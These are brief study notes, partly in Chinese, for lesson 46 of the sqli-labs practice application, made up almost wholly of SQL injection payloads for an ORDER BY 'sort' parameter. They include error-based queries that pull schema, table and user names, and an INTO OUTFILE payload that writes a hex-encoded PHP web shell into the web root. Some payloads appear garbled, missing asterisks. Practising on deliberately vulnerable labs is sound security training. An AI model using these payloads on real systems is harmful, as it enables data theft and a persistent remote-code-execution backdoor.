#sqli-labs less46

#sqli-labs less46

and (select count(*) from information_schema.tables group by concat((select concat(schema_name)from information_schema.schemata limit 2,1),floor(rand(0)*2)))--+

?sort=1 and (select count() from information_schema.tables group by concat((select concat(table_name)from information_schema.tables where table_schema='security'limit 0,1),floor(rand(0)2)))

?sort=1 and (extractvalue(1,(select user())))

into outfile "c:\phpstudy\PHPTutorial\WWW\sqli-labs-master\less-46\1.txt"

into outfile "c:\phpstudy\PHPTutorial\WWW\sqli-labs-master\less-46\2.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b27524541444552275d293b3f3e--+

terminated by 0x 用于网马进行 16 进制转换

3c3f706870206576616c28245f504f53545b27524541444552275d293b3f3e这个是我的一句话木马十六进制